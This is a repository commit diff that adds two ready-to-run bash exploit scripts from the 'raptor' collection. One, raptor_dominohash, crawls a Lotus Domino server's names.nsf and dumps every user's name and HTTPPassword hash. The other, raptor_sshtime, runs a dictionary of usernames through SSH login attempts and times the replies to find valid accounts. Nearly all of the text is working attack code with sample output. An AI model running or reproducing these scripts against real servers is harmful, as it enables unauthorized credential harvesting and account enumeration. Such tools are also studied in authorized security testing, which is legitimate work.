Add files via upload

Author: 0xdea

misc/raptor_dominohash

@@ -0,0 +1,137 @@
+#!/bin/bash
+
+#
+# $Id: raptor_dominohash,v 1.3 2007/02/13 17:27:10 raptor Exp $
+#
+# raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump
+# Copyright (c) 2007 Marco Ivaldi <[email protected]>
+#
+# Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, 
+# stores sensitive data from names.nsf in hidden form fields, which allows 
+# remote attackers to read the HTML source to obtain sensitive information such 
+# as (1) the password hash in the HTTPPassword field, (2) the password change 
+# date in the HTTPPasswordChangeDate field, (3) the client platform in the 
+# ClntPltfrm field, (4) the client machine name in the ClntMachine field, and 
+# (5) the client Lotus Domino release in the ClntBld field, a different 
+# vulnerability than CVE-2005-2696 (CVE-2005-2428).
+#
+# According to testing, it's possible to dump all HTTPPassword hashes using the 
+# $defaultview view instead of $users. This saves a considerable amount of time.
+# 
+# The code may require some changes to properly work with your configuration.
+#
+# See also:
+# http://www.securiteinfo.com/outils/DominoHashBreaker.shtml
+#
+# Usage:
+# $ ./raptor_dominohash 192.168.0.202
+# [...]
+# Extracting the view entries...
+# Done! 656 unique entries have been found.
+# Now ready to dump password hashes...
+# [...]
+# [http://192.168.0.202/names.nsf/$defaultview/00DA2289CC118A854925715A000611A3]
+# FirstName:      Foo
+# LastName:       Bar
+# ShortName:      fbar
+# HTTPPassword:   (355E98E7C7B59BD810ED845AD0FD2FC4)
+# [...]
+#
+# Vulnerable platforms:
+# Lotus Domino R6 Webmail [tested]
+# Lotus Domino R5 Webmail [untested]
+# Lotus Domino R4 Webmail? [untested]
+#
+
+# Some vars
+i=1
+tmp1=dominohash1.tmp
+tmp2=dominohash2.tmp
+
+# Command line
+host=$1
+
+# Local fuctions
+function header() {
+	echo ""
+	echo "raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump"
+	echo "Copyright (c) 2007 Marco Ivaldi <[email protected]>"
+	echo ""
+}
+
+function footer() {
+	echo ""
+	exit 0
+}
+
+function usage() {
+	header
+	echo "usage  : ./raptor_dominohash <host>"
+	echo "example: ./raptor_dominohash 192.168.0.202"
+	footer
+}
+
+function notfound() {
+	header
+	echo "error  : curl not found"
+	footer
+}
+
+# Check if curl is there
+curl=`which curl 2>/dev/null`
+if [ $? -ne 0 ]; then
+	notfound
+fi
+
+# Input control
+if [ -z "$1"  ]; then
+	usage
+fi
+
+# Remove temporary files
+rm -f $tmp1
+rm -f $tmp2
+
+header
+
+# Extract the view entries
+echo "Extracting the view entries..."
+while :
+do
+	curl "http://${host}/names.nsf/\$defaultview?Readviewentries&Start=${i}" 2>/dev/null | grep unid >> $tmp1
+
+	# Check grep return value
+	if [ $? -ne 0 ]; then
+		break
+	fi
+
+	# Go for the next page
+	i=`expr $i + 30`
+	echo -ne "\b\b\b\b\b\b\b\b$i"
+done
+
+cat $tmp1 | awk -F'unid="' '{print $2}' | awk -F'"' '{print $1}' | sort | uniq > $tmp2
+
+# Check if some view entries have been found
+if [ ! -s $tmp2 ]; then
+	echo "No entries found on host ${host}!"
+	footer
+fi
+echo -ne "\b\b\b\b\b\b\b\bDone! "
+echo "`wc -l ${tmp2} | awk '{print $1}'` unique entries have been found."
+echo ""
+
+# Perform the hash dumping
+echo "Now ready to dump password hashes..."
+echo ""
+sleep 4
+for unid in `cat $tmp2`
+do
+	echo "[http://${host}/names.nsf/\$defaultview/${unid}]"
+	echo ""
+	#curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 2>/dev/null | egrep '"FullName"|"HTTPPassword"'
+	curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 2>/dev/null | egrep '"FirstName"|"LastName"|"ShortName"|"HTTPPassword"' | awk -F'input name="' '{print $2}' | awk -F'" type="hidden" value="' '{print $1 ":\t" $2}' | tr -d '">'
+	echo ""
+done
+
+footer

misc/raptor_sshtime

@@ -1 +1,85 @@
+#!/bin/bash
 
+#
+# $Id: raptor_sshtime,v 1.1 2007/02/13 16:29:38 raptor Exp $
+#
+# raptor_sshtime - [Open]SSH remote timing attack exploit
+# Copyright (c) 2006 Marco Ivaldi <[email protected]>
+#
+# OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately 
+# sends an error message when a user does not exist, which allows remote 
+# attackers to determine valid usernames via a timing attack (CVE-2003-0190).
+#
+# OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions,
+# and possibly under limited configurations, allows remote attackers to 
+# determine valid usernames via timing discrepancies in which responses take 
+# longer for valid usernames than invalid ones, as demonstrated by sshtime. 
+# NOTE: as of 20061014, it appears that this issue is dependent on the use of 
+# manually-set passwords that causes delays when processing /etc/shadow due to 
+# an increased number of rounds (CVE-2006-5229).
+# 
+# This is a simple shell script based on expect meant to remotely analyze 
+# timing differences in sshd "Permission denied" replies. Depending on OpenSSH 
+# version and configuration, it may lead to disclosure of valid usernames. 
+#
+# Usage example: 
+# [make sure the target hostkey has been approved before]
+# ./sshtime 192.168.0.1 dict.txt
+#
+
+# Some vars
+port=22
+
+# Command line
+host=$1
+dict=$2
+
+# Local functions
+function head() {
+	echo ""
+	echo "raptor_sshtime - [Open]SSH remote timing attack exploit"
+	echo "Copyright (c) 2006 Marco Ivaldi <[email protected]>"
+	echo ""
+}
+
+function foot() {
+	echo ""
+	exit 0
+}
+	
+function usage() {
+	head
+	echo "[make sure the target hostkey has been approved before]"
+	echo ""
+	echo "usage  : ./sshtime <target> <wordlist>"
+	echo "example: ./sshtime 192.168.0.1 dict.txt"
+	foot
+}
+
+function notfound() {
+	head
+	echo "error  : expect interpreter not found!"
+	foot
+}
+
+# Check if expect is there
+expect=`which expect 2>/dev/null`
+if [ $? -ne 0 ]; then
+	notfound
+fi
+
+# Input control
+if [ -z "$2"  ]; then
+	usage
+fi
+
+# Perform the bruteforce attack
+head
+
+for user in `cat $dict`
+do
+	echo -ne "$user@$host\t\t"
+	(time -p $expect -c "log_user 0; spawn -noecho ssh -p $port $host -l $user; for {} 1 {} {expect -nocase \"password*\" {send \"dummy\r\"} eof {exit}}") 2>&1 | grep real
+done
+
+foot